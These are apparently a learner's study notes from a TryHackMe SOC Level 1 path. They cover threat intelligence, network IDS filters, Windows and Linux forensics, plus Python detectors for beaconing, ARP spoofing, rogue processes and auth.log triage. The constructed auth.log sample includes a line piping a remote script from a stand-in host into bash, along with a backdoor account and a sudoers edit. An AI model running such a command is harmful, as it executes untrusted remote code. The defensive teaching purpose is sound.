~/THM/ SOC L1 Path

Some notes from SOC L1 Path

Cyber Defence Frameworks

C2 (Command and Control) beaconing : periodic callback traffic from a compromised host to the attacker's control infrastructure, usually on a fixed (sometimes jittered) interval.

Shadow Copy is a Microsoft technology that can create backup copies, snapshots of computer files, or volumes.

Threat modelling is a series of steps to ultimately improve the security of a system.

Adversary Operator is the "hacker" or person(s) conducting the intrusion activity. Adversary Customer is the entity that stands to benefit from the activity conducted in the intrusion.

Cyber Threat Intelligence

Data: Discrete indicators associated with an adversary, such as IP addresses, URLs or hashes.

Information: A combination of multiple data points that answer questions such as “How many times have employees accessed tryhackme.com within the month?”

Intelligence: The correlation of data and information to extract patterns of actions based on contextual analysis.

Urlscan.io is a free service developed to assist in scanning and analysing websites.

Abuse.ch is a research project developed to identify and track malware and botnets through several operational platforms developed under the project:

  • Malware Bazaar : a resource for sharing malware samples.

  • Feodo Tracker : a resource used to track botnet command and control (C2) infrastructure linked with Emotet, Dridex and TrickBot.

  • SSL Blacklist : a resource for collecting and providing a blocklist for malicious SSL certificates and JA3/JA3s fingerprints.

  • URL Haus : a resource for sharing malware distribution sites.

  • Threat Fox : a resource for sharing indicators of compromise (IOCs).

YARA [Loki, yarGen] --> rules that match strings, byte patterns and conditions in files or memory, used in malware analysis. Loki is a scanner that applies YARA rules (and other IOCs) to a host; yarGen generates YARA rules from sample files. Valhalla is an online YARA rule feed created and hosted by Nextron Systems.

OpenCTI is another open-source platform designed to provide organisations with the means to manage CTI through the storage, analysis, visualisation and presentation of threat campaigns, malware and IOCs.

MISP (Malware Information Sharing Platform) is an open-source threat information platform that facilitates the collection, storage and distribution of threat intelligence and Indicators of Compromise (IOCs) related to malware, cyber attacks, financial fraud or any intelligence within a community of trusted members.

Network Security and Traffic Analysis

SOAR (Security Orchestration, Automation and Response) : technology that coordinates and automates tasks between various people, tools, and data within a single platform to identify anomalies, threats, and vulnerabilities. It also supports vulnerability management, incident response, and security operations.

Snort is the foremost open-source Intrusion Prevention System (IPS) in the world (it inspects IP, TCP, UDP and ICMP traffic). Snort uses a series of rules that define malicious network activity, finds packets that match those rules and generates alerts for users; in inline (IPS) mode it can also drop the matching packets.

There are four main types of IPS systems:

1] Network Intrusion Prevention System (NIPS)

2] Behaviour-based Intrusion Prevention System (Network Behaviour Analysis - NBA) [requires a training period, also known as "baselining"]

3] Wireless Intrusion Prevention System (WIPS)

4] Host-based Intrusion Prevention System (HIPS)

The TCP flags: F - FIN, S - SYN, R - RST, P - PSH, A - ACK, U - URG

local.rules -->
  alert tcp any 80 <> any any (msg:"TCP port 80 found"; sid:100001; rev:1;)

Terminal --> sudo snort -c local.rules -A full -l . -r mx-3.pcap

Open the log --> sudo snort -r snort.log.1671720080 [-n <count> : stop after that many packets]

Multiple content matches (fast_pattern marks the content the fast matcher checks first) -->
  alert tcp any 21 <> any any (msg:"FTP Failed Admin Login-Bad or No Password"; content:"331 Password"; fast_pattern; content:"Administrator"; sid:100006; rev:1;)

NetworkMiner is an open-source traffic sniffer, pcap handler and protocol analyser, developed and still maintained by Netresec.

  • Don't use this tool as a primary sniffer.

  • Use this tool to get an overview of the traffic, then move on to Wireshark and tcpdump for a more in-depth investigation.

Zeek (formerly Bro) is an open-source network monitoring tool (traffic analyser) that also has commercial offerings. [-C : ignore checksum errors, -r : read a pcap, -s : load a signature file]

  • zeek -C -r http.pcap -s http-password.sig

  • zeek -C -r ftp.pcap 201.zeek -s ftp-admin.sig

  • readable --> cat conn.log | zeek-cut uid proto id.orig_h id.orig_p id.resp_h id.resp_p

https://try.bro.org/#/?example=hello [ Zeek's official training platform ]
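An added example (not from the TryHackMe material or the Zeek project): it parses a Zeek conn.log the way zeek-cut does, then looks for the C2 beaconing mentioned at the top of these notes, i.e. connections between one source/destination pair recurring at a near-constant interval. The log lines are constructed sample data, and the thresholds (at least 4 connections, coefficient of variation of the gaps <= 0.1) are assumptions to tune per environment.

```python
"""Parse a Zeek conn.log (TSV with a #fields header) and flag beaconing.

Added example, not part of the TryHackMe notes or the Zeek project. It
re-implements the column selection zeek-cut does, then groups connections
by (orig_h, resp_h, resp_p) and flags pairs whose inter-connection gaps are
nearly constant, the footprint of C2 beaconing. The log below is constructed.
"""
import statistics
from collections import defaultdict

SAMPLE_CONN_LOG = """\
#separator \\x09
#set_separator\t,
#empty_field\t(empty)
#unset_field\t-
#path\tconn
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration
#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval
1671720000.000000\tC1a\t10.0.0.5\t49152\t203.0.113.7\t443\ttcp\tssl\t0.5
1671720060.100000\tC1b\t10.0.0.5\t49153\t203.0.113.7\t443\ttcp\tssl\t0.4
1671720120.050000\tC1c\t10.0.0.5\t49154\t203.0.113.7\t443\ttcp\tssl\t0.6
1671720180.000000\tC1d\t10.0.0.5\t49155\t203.0.113.7\t443\ttcp\tssl\t0.5
1671720240.020000\tC1e\t10.0.0.5\t49156\t203.0.113.7\t443\ttcp\tssl\t0.5
1671720003.000000\tC2a\t10.0.0.9\t50000\t198.51.100.2\t80\ttcp\thttp\t1.2
1671720017.000000\tC2b\t10.0.0.9\t50001\t198.51.100.2\t80\ttcp\thttp\t0.3
1671720400.000000\tC2c\t10.0.0.9\t50002\t198.51.100.2\t80\ttcp\thttp\t2.0
1671720950.000000\tC2d\t10.0.0.9\t50003\t198.51.100.2\t80\ttcp\thttp\t0.1
1671721100.000000\tC2e\t10.0.0.9\t50004\t198.51.100.2\t80\ttcp\thttp\t0.7
#close\t2022-12-22-15-00-00
"""


def parse_conn_log(text):
    """Return one dict per record; column names come from the #fields header."""
    fields = None
    rows = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other header lines, #close, blanks
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def zeek_cut(rows, *names):
    """Equivalent of `zeek-cut name1 name2 ...`: keep only the named columns."""
    return [tuple(r[n] for n in names) for r in rows]


def find_beacons(rows, min_conns=4, max_cv=0.1):
    """Flag (orig_h, resp_h, resp_p) whose connection gaps are regular.

    cv = population stdev / mean of the gaps between consecutive connections;
    a low coefficient of variation means a near-constant period. Thresholds
    are assumptions. Returns {pair: mean_gap_seconds}.
    """
    by_pair = defaultdict(list)
    for r in rows:
        by_pair[(r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])].append(float(r["ts"]))
    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            beacons[pair] = round(mean, 1)
    return beacons


if __name__ == "__main__":
    rows = parse_conn_log(SAMPLE_CONN_LOG)
    for row in zeek_cut(rows, "uid", "proto", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p"):
        print("\t".join(row))
    print(find_beacons(rows))
```

The 10.0.0.5 -> 203.0.113.7:443 pair fires (five TLS connections sixty seconds apart), the 10.0.0.9 browsing pattern does not. Real implants add jitter, so on production data widen max_cv and also look at bytes-per-connection, which beacons keep almost constant.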

Brim is an open-source desktop application that processes pcap files and log files. Its primary focus is providing search and analytics. The common best practice is handling medium-sized pcaps with [Wireshark], creating logs and correlating events with [Zeek], and processing multiple logs in [Brim].

Wireshark is one of the most potent traffic analyser tools available in the wild. There are multiple purposes for its use:

  • Detecting and troubleshooting network problems, such as network load failure points and congestion.

  • Detecting security anomalies, such as rogue hosts, abnormal port usage, and suspicious traffic.

  • Investigating and learning protocol details, such as response codes and payload data.

Note: Wireshark is not an Intrusion Detection System (IDS). It only allows analysts to discover and investigate the packets in depth. It also doesn't modify packets; it reads them. Hence, detecting any anomaly or network problem highly relies on the analyst's knowledge and investigation skills.

Get hash of any file --> md5sum ~/Desktop/{Name of the file you just extracted}

Advanced Filtering:

  • http.server contains "Apache"

  • http.host matches "\.(php|html)"  [regex; the dot is escaped so it matches a literal "."]

  • tcp.port in {80 443 8080}

  • upper(http.server) contains "APACHE"

  • lower(http.server) contains "apache"

  • string(frame.number) matches "[13579]$"  [odd frame numbers]

Nmap Scans

TCP SYN scan filter : [tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size <= 1024]  (Nmap's SYN probes advertise a small window; normal clients open with larger ones)

UDP : a closed port returns an ICMP Type 3, Code 3 message (Destination unreachable, Port unreachable). filter : [icmp.type==3 and icmp.code==3]

ARP Poisoning/Spoofing (A.K.A. Man In The Middle Attack)

The ultimate aim is to manipulate the "IP to MAC address table" (the ARP cache). Suspicious signs --> a duplicate value for one IP highlights the conflict; in the room's capture, the MAC address that ends with "b4" is the destination of all HTTP packets, i.e. the host sitting in the middle.

Opcode 1: ARP requests --> arp.opcode == 1

Opcode 2: ARP responses --> arp.opcode == 2

Hunt: ARP scanning --> arp.dst.hw_mac==00:00:00:00:00:00

Hunt: Possible ARP poisoning detection --> arp.duplicate-address-detected or arp.duplicate-address-frame

Hunt: Possible ARP flooding detection --> ((arp) && (arp.opcode == 1)) && (arp.src.hw_mac == target-mac-address)
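The same three hunts as code, an added example that is not part of the TryHackMe material. It runs over a list of constructed ARP frames (dicts named after the Wireshark fields arp.opcode, arp.src.hw_mac, arp.src.proto_ipv4, arp.dst.hw_mac, arp.dst.proto_ipv4) and reports a scan (requests to the all-zero target MAC sweeping many IPs), a conflict (one IP claimed by two MACs, what Wireshark calls duplicate-address-detected), a flood (one MAC sending many requests) and the MAC that claims more than one IP, the signature of a two-sided poison. The thresholds are assumptions.

```python
"""ARP scan / poisoning / flooding detection over captured ARP frames.

Added example, not from the TryHackMe notes. The frames below are
constructed: a sweep from aa:bb:cc:00:00:01, a legitimate reply for the
gateway 192.168.1.1 from ...:fe, then poisoned replies from ...:b4 that
claim both the gateway and the victim 192.168.1.25.
"""
from collections import Counter, defaultdict

REQUEST, REPLY = 1, 2          # arp.opcode values
ZERO_MAC = "00:00:00:00:00:00"  # arp.dst.hw_mac in a request that probes an unknown host

SAMPLE_ARP = [
    {"opcode": REQUEST, "src_mac": "aa:bb:cc:00:00:01", "src_ip": "192.168.1.10",
     "dst_mac": ZERO_MAC, "dst_ip": f"192.168.1.{i}"}
    for i in range(1, 31)
] + [
    {"opcode": REPLY, "src_mac": "aa:bb:cc:00:00:fe", "src_ip": "192.168.1.1",
     "dst_mac": "aa:bb:cc:00:00:10", "dst_ip": "192.168.1.25"},
    {"opcode": REPLY, "src_mac": "aa:bb:cc:00:00:b4", "src_ip": "192.168.1.1",
     "dst_mac": "aa:bb:cc:00:00:10", "dst_ip": "192.168.1.25"},
    {"opcode": REPLY, "src_mac": "aa:bb:cc:00:00:b4", "src_ip": "192.168.1.25",
     "dst_mac": "aa:bb:cc:00:00:fe", "dst_ip": "192.168.1.1"},
]


def arp_scanners(frames, min_targets=10):
    """MACs that requested many distinct IPs with an all-zero target MAC
    (filter equivalent: arp.opcode == 1 && arp.dst.hw_mac == 00:00:00:00:00:00)."""
    targets = defaultdict(set)
    for f in frames:
        if f["opcode"] == REQUEST and f["dst_mac"] == ZERO_MAC:
            targets[f["src_mac"]].add(f["dst_ip"])
    return {mac: len(ips) for mac, ips in targets.items() if len(ips) >= min_targets}


def arp_conflicts(frames):
    """IPs announced by more than one MAC in replies (duplicate-address-detected).
    Returns {ip: sorted MACs}; the MAC that is not the known owner is the spoofer."""
    claims = defaultdict(set)
    for f in frames:
        if f["opcode"] == REPLY:
            claims[f["src_ip"]].add(f["src_mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def arp_flooders(frames, min_requests=20):
    """MACs sending an abnormal number of requests
    (filter equivalent: (arp.opcode == 1) && arp.src.hw_mac == <mac>)."""
    counts = Counter(f["src_mac"] for f in frames if f["opcode"] == REQUEST)
    return {mac: n for mac, n in counts.items() if n >= min_requests}


def suspect_mitm(frames):
    """MACs whose replies claim more than one IP: the classic two-sided poison."""
    ips_by_mac = defaultdict(set)
    for f in frames:
        if f["opcode"] == REPLY:
            ips_by_mac[f["src_mac"]].add(f["src_ip"])
    return sorted(mac for mac, ips in ips_by_mac.items() if len(ips) > 1)


if __name__ == "__main__":
    print("scanners :", arp_scanners(SAMPLE_ARP))
    print("conflicts:", arp_conflicts(SAMPLE_ARP))
    print("flooders :", arp_flooders(SAMPLE_ARP))
    print("mitm     :", suspect_mitm(SAMPLE_ARP))
```

A conflict alone can be a DHCP re-lease or a failed-over cluster VIP; the combination of a conflict with one MAC claiming several IPs is what makes the ...:b4 host worth pulling the HTTP stream for.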

Identifying Hosts: DHCP, NetBIOS and Kerberos

"DHCP Request" packets contain the hostname information --> [dhcp.option.dhcp == 3]

"DHCP ACK" packets represent the accepted requests --> [dhcp.option.dhcp == 5]

"DHCP NAK" packets represent denied requests --> [dhcp.option.dhcp == 6]

  • dhcp.option.hostname contains "keyword"  ["DHCP Request"]

  • dhcp.option.domain_name contains "keyword"  ["DHCP ACK"]

NetBIOS (Network Basic Input/Output System) is the technology responsible for allowing applications on different hosts to communicate with each other. Query details can contain the name, Time to Live (TTL) and IP address --> nbns.name contains "keyword"

Kerberos is the default authentication service for Microsoft Windows domains. It is responsible for authenticating service requests between two or more computers over the untrusted network. The ultimate aim is to prove identity securely.

  • CNameString: the username --> kerberos.CNameString and !(kerberos.CNameString contains "$")  [names ending in "$" are hostnames, the ones without it are user names]

Tunnelling Traffic: ICMP and DNS

"ICMP" options for grabbing the low-hanging fruits: [data.len > 64 and icmp]  (regular packet length: 64 bytes)

  • Packet length.

  • ICMP destination addresses.

  • Encapsulated protocol signs in the ICMP payload.

"DNS" options for grabbing the low-hanging fruits:

  • dns contains "dnscat"  [known tool patterns: dnscat and dns2tcp]

  • dns.qry.name.len > 15 and !mdns  [exclude link-local device (mDNS) queries]

  • Query length.

  • Anomalous and non-regular names in DNS addresses.

  • Long DNS addresses with encoded subdomain addresses.

  • Known patterns like dnscat and dns2tcp.

  • Statistical analysis, like an anomalous volume of DNS requests for a particular target.

ftp.request.command == "RETR"  ["RETR" is used to retrieve (download) files or documents from the FTP server; "STOR" is the FTP command for an uploaded file, filter on it the same way]

HTTPS uses the TLS protocol to encrypt communications.

Endpoint protection & monitoring

  • The System process (process ID 4) is the home for a special kind of thread that runs only in kernel mode: a kernel-mode system thread.

  • smss.exe (Windows Session Manager), is responsible for creating new sessions. It is the first user-mode process started by the kernel.

  • csrss.exe (Client Server Runtime Process) [created by smss.exe] is the user-mode side of the Windows subsystem. This process is responsible for the Win32 console window and for process and thread creation and deletion.

  • wininit.exe is responsible for launching [ services.exe (Service Control Manager), lsass.exe (Local Security Authority) ]

  • services.exe Its primary responsibility is to handle system services: loading services, interacting with services and starting or ending services.

  • svchost.exe The Service Host (Host Process for Windows Services) is responsible for hosting and managing Windows services.

  • Local Security Authority Subsystem Service (LSASS) is a process responsible for enforcing the security policy on the system

  • The Windows Logon, winlogon.exe, is responsible for handling the Secure Attention Sequence (SAS), the CTRL+ALT+DELETE key combination.

  • Windows Explorer, explorer.exe. This process gives the user access to their folders, files, the Start Menu and the Taskbar.
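The practical use of the core-process list above is spotting what does not fit it. This added example (not from the TryHackMe material) encodes the expected parent, image path and instance count for the core processes and checks a process listing against them, also catching look-alike names. The process records are constructed sample data in a tasklist/Sysmon-like shape; the expectations table and the 0.85 name-similarity cutoff are my assumptions.

```python
"""Check a Windows process list against the expected core-process tree.

Added example, not part of the TryHackMe notes. Encodes: System -> smss.exe,
smss.exe -> csrss.exe / wininit.exe / winlogon.exe (that smss child exits, so
the parent may be gone), wininit.exe -> services.exe / lsass.exe,
services.exe -> svchost.exe; single instances of smss, wininit, services,
lsass; all of them from System32. Sample data below is constructed.
"""
import difflib
from collections import Counter

SYSTEM32 = r"c:\windows\system32"

# image name -> (allowed parent image names, max instances or None).
# None inside the parent set means "parent already exited" is acceptable.
EXPECTATIONS = {
    "smss.exe":     ({"system"}, 1),
    "csrss.exe":    ({"smss.exe", None}, None),
    "wininit.exe":  ({"smss.exe", None}, 1),
    "winlogon.exe": ({"smss.exe", None}, None),
    "services.exe": ({"wininit.exe"}, 1),
    "lsass.exe":    ({"wininit.exe"}, 1),
    "svchost.exe":  ({"services.exe"}, None),
}

# (pid, ppid, image name, full path); ppid 420 is an smss child that has exited
SAMPLE_PROCESSES = [
    (4,    0,    "System",       ""),
    (340,  4,    "smss.exe",     r"C:\Windows\System32\smss.exe"),
    (436,  420,  "csrss.exe",    r"C:\Windows\System32\csrss.exe"),
    (512,  420,  "wininit.exe",  r"C:\Windows\System32\wininit.exe"),
    (600,  512,  "services.exe", r"C:\Windows\System32\services.exe"),
    (620,  512,  "lsass.exe",    r"C:\Windows\System32\lsass.exe"),
    (780,  600,  "svchost.exe",  r"C:\Windows\System32\svchost.exe"),
    (2100, 1500, "explorer.exe", r"C:\Windows\explorer.exe"),
    # constructed anomalies
    (3320, 2100, "svchost.exe",  r"C:\Users\bob\AppData\Local\Temp\svchost.exe"),
    (3400, 2100, "lsass.exe",    r"C:\Windows\Temp\lsass.exe"),
    (3510, 2100, "scvhost.exe",  r"C:\Users\bob\AppData\Roaming\scvhost.exe"),
]


def check_processes(processes, similarity=0.85):
    """Return a list of (pid, image name, reason) findings."""
    by_pid = {p[0]: p for p in processes}
    counts = Counter(p[2].lower() for p in processes)
    findings = []
    for pid, ppid, name, path in processes:
        lname = name.lower()
        if lname not in EXPECTATIONS:
            # typo-squatted core names such as scvhost.exe or lsas.exe
            if lname != "system" and difflib.get_close_matches(lname, EXPECTATIONS, 1, similarity):
                findings.append((pid, name, "lookalike of a core process name"))
            continue
        parents, max_instances = EXPECTATIONS[lname]
        parent = by_pid.get(ppid)
        parent_name = parent[2].lower() if parent else None
        if parent_name not in parents:
            findings.append((pid, name, f"unexpected parent {parent_name}"))
        if not path.lower().startswith(SYSTEM32 + "\\"):
            findings.append((pid, name, f"unexpected path {path}"))
        if max_instances and counts[lname] > max_instances:
            findings.append((pid, name, f"{counts[lname]} instances, expected {max_instances}"))
    return findings


if __name__ == "__main__":
    for pid, name, reason in check_processes(SAMPLE_PROCESSES):
        print(f"{pid:>5} {name:<14} {reason}")
```

Both lsass.exe entries are reported for the instance count, which is intended: the analyst decides which one is real from its parent and path (the genuine one is spawned by wininit.exe from System32). Feed it the output of tasklist /V, Process Hacker or Sysmon Event ID 1 records and the same checks apply.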

  • Sigcheck : is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file’s status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.

  • Streams : "The NTFS file system provides applications the ability to create alternate data streams of information. By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates."

  • SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.

  • TCPView is a Windows program that will show you detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses.

  • Autoruns : shows everything configured to start automatically (Run keys, scheduled tasks, services, drivers, and more). A good tool to search for malicious entries created on the local machine to establish persistence.

  • ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.

  • Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It combines the features of two legacy Sysinternals utilities, Filemon and Regmon.

Events to monitor : https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor

Want to detect if a new service was installed? Look for Event ID [ 7045 ] in the System log. Want to know if a firewall rule was deleted from the host? That is Event ID [ 2006/2033 ] in the Windows Firewall With Advanced Security log.

Osquery is an open-source agent created by Facebook in 2014. It exposes the operating system as a relational database, so you can query its tables with SQL: the list of running processes, the user accounts created on the host, the processes communicating with suspicious domains, and so on.

sudo systemctl enable auditd.service : start the audit daemon on boot

Security Information and Event Management

SIEM stands for Security Information and Event Management system

| stats count(src_ip) as Requests by src_ip   : count requests per source IP

| sort - Requests   : sort by Requests, descending

| table _time uri src dest_ip form_data   : build a table of (time, uri, source IP, destination IP, form data)

index=botsv1 sourcetype=stream:http dest_ip="192.168.250.70" *.exe   : executables delivered to the host (installation phase)

Sysmon event IDs : https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

For more information about the adversary :

  • Robtex [https://www.robtex.com/]

  • VirusTotal

  • whois [whois.domaintools.com]

  • ThreatMiner

  • Hybrid Analysis

Search for the suspicious domains at https://otx.alienvault.com

Summary of "botsv1" : botsv1.txt

Sysmon [Event IDs] : Event ID 1 : Process Creation ; Event ID 3 : Network Connection (connections to remote hosts) ; Event ID 12 : RegistryEvent (Object create and delete)

Windows Security log : Event ID 4688 : A new process has been created ; Event ID 4720 : A user account was created

PowerShell Operational log : Event ID 4103 : module logging (pipeline execution details), filter on it to detect PowerShell activity

Digital Forensics and Incident Response

Artifacts : pieces of evidence that point to an activity performed on a system.

Evidence preservation : we must maintain the integrity of the evidence we collect.

Chain of custody : once evidence is collected, it must be kept in secure, documented custody.

Order of volatility : digital evidence is often volatile, i.e. it can be lost forever if not captured in time, so the most volatile sources are collected first.

Timeline creation : the information in the artifacts must be presented understandably to be fully used.

The majority of these hives are located in the C:\Windows\System32\Config directory and are:

  • DEFAULT (mounted on HKEY_USERS\DEFAULT)

  • SAM (mounted on HKEY_LOCAL_MACHINE\SAM)

  • SECURITY (mounted on HKEY_LOCAL_MACHINE\Security)

  • SOFTWARE (mounted on HKEY_LOCAL_MACHINE\Software)

  • SYSTEM (mounted on HKEY_LOCAL_MACHINE\System)

Eric Zimmerman's tools

  • PECmd.exe (Prefetch Parser) : PECmd.exe -f <prefetch file> --csv <output dir> --> C:\Windows\Prefetch

  • WxTCmd.exe : parses the Windows 10 Timeline. WxTCmd.exe -f <ActivitiesCache.db> --csv <output dir> --> C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db

  • JLECmd.exe : parses Jump Lists, the recently used files a user can open directly from the taskbar --> C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations

  • LECmd.exe (Lnk Explorer) : parses shortcut (.lnk) files [C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent]

EZViewer --> read the .csv output of the EZ tools ; KAPE --> collect (triage) the artifact files

setupapi.dev.log : artifact will tell us the first and last connection times of a removable drive

C:\Users\hp\AppData\Local\Microsoft\Windows\History : browser history

C:\Windows\AppCompat\Programs\Amcache.hve : Windows creates this hive to save information on programs that were recently run on the system.

In summary, the bits that make up a file are stored in clusters. All the filenames on a file system, their starting clusters, and their lengths are stored in directories, and the location of each cluster on the disk is stored in the File Allocation Table. As storage needed to grow, FAT12, FAT16 and FAT32 were introduced (the number is the bit width of the cluster addresses).

The NTFS file system

  • Journaling : The NTFS file system keeps a log of changes to the metadata in the volume.

  • Access Controls : NTFS has user-based access controls (ACLs) on files and folders; the FAT file system did not have access controls based on the user.

  • Volume Shadow Copy : ransomware actors have been noted to delete the shadow copies on a victim's file systems to prevent them from recovering their data.

  • Alternate Data Streams : Alternate data streams (ADS) is a feature in NTFS that allows files to have multiple streams of data stored in a single file.

$MFT is the first record in the volume; the Volume Boot Record (VBR) points to the cluster where it is located. $MFT stores information about the clusters where all other objects present on the volume are located, so it is effectively a directory of all the files on the volume.

  • MFTECmd.exe -f C:\Users\THM-4n6\Desktop\triage\C\$Boot  [prints to the console]

  • MFTECmd.exe -f C:\Users\THM-4n6\Desktop\triage\C\$MFT --csv C:\Users\THM-4n6\Desktop  [writes a .csv, open it in EZViewer]

Linux

  • OS release info : cat /etc/os-release

  • User accounts : cat /etc/passwd | column -t -s :

  • Group Info : cat /etc/group

  • Sudoers List : sudo cat /etc/sudoers

  • Login info : sudo last -f /var/log/wtmp [successful logins] ; sudo last -f /var/log/btmp [failed logins]

  • Authentication logs : cat /var/log/auth.log | tail [only the most recent lines, easier to read]

  • Hostname : cat /etc/hostname

  • Timezone : cat /etc/timezone

  • Network Configuration : cat /etc/network/interfaces

  • Active network connections : netstat -natp

  • Running processes : ps aux [ps aux | grep Xtigervnc]

  • DNS info : cat /etc/hosts

  • Cron jobs : cat /etc/crontab [ information about the time interval after which the command has to run ]

  • Service startup : ls /etc/init.d/ [start and run in the background after every system boot]

  • .bashrc : cat ~/.bashrc [when a bash shell is spawned, it runs the commands stored in the .bashrc file]

  • Bash history : cat ~/.bash_history [any commands other than the ones run using sudo are stored in the bash history]

  • Sudo execution history : cat /var/log/auth.log* | grep -i COMMAND | tail [the sudo lines of the auth log]

  • vim : cat ~/.viminfo

  • Syslog : cat /var/log/syslog* | head [ contains messages that are recorded by the host about system activity, all of the syslogs, use (*) wildcard.]

  • Auth logs : cat /var/log/auth.log* | head

  • Third-party : ls /var/log [logs of third-party applications such as web server, database, or file share server] ; ls /var/log/apache2/ [web server logs] ; a database server such as MySQL, if installed, typically keeps its logs under /var/log as well (e.g. /var/log/mysql/)
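The cat/grep/tail one-liners above are what you type on a live box; this added example (not from the TryHackMe material) does the same triage of an auth.log in Python so it can be run over collected copies: sudo executions (the `grep -i COMMAND` view), failed SSH logins grouped by source IP (the btmp view), the password-guessing-then-success pattern, and new accounts created with useradd. The log lines are constructed, in the traditional syslog format auth.log uses; the brute-force threshold is an assumption.

```python
"""Triage a Linux auth.log: sudo history, failed SSH logins, new accounts.

Added example, not part of the TryHackMe notes. The sample log is
constructed; the formats match what sshd, sudo and useradd write to
/var/log/auth.log on Debian/Ubuntu systems.
"""
import re
from collections import Counter, defaultdict

SAMPLE_AUTH_LOG = """\
Dec 22 15:00:01 web01 sshd[2210]: Failed password for invalid user admin from 203.0.113.44 port 51022 ssh2
Dec 22 15:00:03 web01 sshd[2212]: Failed password for root from 203.0.113.44 port 51030 ssh2
Dec 22 15:00:05 web01 sshd[2214]: Failed password for root from 203.0.113.44 port 51041 ssh2
Dec 22 15:00:09 web01 sshd[2216]: Accepted password for ubuntu from 203.0.113.44 port 51055 ssh2
Dec 22 15:00:10 web01 sshd[2216]: pam_unix(sshd:session): session opened for user ubuntu by (uid=0)
Dec 22 15:01:12 web01 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/sbin/useradd -m -s /bin/bash svc-backup
Dec 22 15:01:13 web01 useradd[2301]: new user: name=svc-backup, UID=1002, GID=1002, home=/home/svc-backup, shell=/bin/bash
Dec 22 15:01:40 web01 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/nano /etc/sudoers
Dec 22 15:02:05 web01 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/bash -c curl -s http://198.51.100.9/x.sh | bash
Dec 22 15:03:00 web01 sshd[2400]: Failed password for backup from 198.51.100.60 port 40000 ssh2
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+)")
NEWUSER_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<user>[^,]+)")


def sudo_commands(log_text):
    """Equivalent of `grep -i COMMAND auth.log`: (invoking user, target user, command)."""
    return [(m["user"], m["target"], m["cmd"])
            for m in map(SUDO_RE.search, log_text.splitlines()) if m]


def failed_logins_by_ip(log_text):
    """Count failed SSH logins per source IP (what `last -f /var/log/btmp` shows)."""
    return Counter(m["ip"] for m in map(FAILED_RE.search, log_text.splitlines()) if m)


def brute_force_then_success(log_text, threshold=2):
    """IPs that failed at least `threshold` times and then logged in successfully:
    the password-guessing success pattern worth escalating. Threshold is an assumption."""
    failed = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        f = FAILED_RE.search(line)
        if f:
            failed[f["ip"]] += 1
            continue
        a = ACCEPTED_RE.search(line)
        if a and failed[a["ip"]] >= threshold:
            hits.append((a["ip"], a["user"], failed[a["ip"]]))
    return hits


def new_users(log_text):
    """Accounts created with useradd (compare against /etc/passwd)."""
    return [m["user"] for m in map(NEWUSER_RE.search, log_text.splitlines()) if m]


if __name__ == "__main__":
    print("sudo   :", *sudo_commands(SAMPLE_AUTH_LOG), sep="\n  ")
    print("failed :", dict(failed_logins_by_ip(SAMPLE_AUTH_LOG)))
    print("guessed:", brute_force_then_success(SAMPLE_AUTH_LOG))
    print("created:", new_users(SAMPLE_AUTH_LOG))
```

On the sample, 203.0.113.44 fails three times and then gets in as ubuntu, after which that session creates an account, edits /etc/sudoers and pipes a remote script into bash: exactly the chain you would reconstruct from auth.log, .bash_history and /etc/passwd on a live system. Rotated logs (auth.log.1, auth.log.2.gz) hold the earlier part of the story, hence the `auth.log*` glob in the commands above.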

Redline

  • Standard Collector : this method configures the script to gather a minimum amount of data for the analysis. It is also usually the fastest method to collect the data you need. It takes only a few minutes to complete.

  • Comprehensive Collector : this method configures the script to gather the most data from your host for further analysis. This method takes up to an hour or more. You will choose this method if you prefer the full analysis of the system.

  • IOC Search Collector (Windows only) : this method collects data that matches the Indicators of Compromise (IOCs) that you created with the help of IOC Editor. You will choose this method if you want to run the data collection against known IOCs that you have gathered either through threat intelligence (data feed or narrative report), incident response, or malware analysis.

  • IOC stands for Indicators of Compromise; they are artifacts of the potential compromise and host intrusion on the system or network that you need to look for when conducting threat hunting or performing incident response. IOCs can be [MD5, SHA1, SHA256 hashes, IP address, C2 domain, file size, filename, file path, a registry key, etc.]

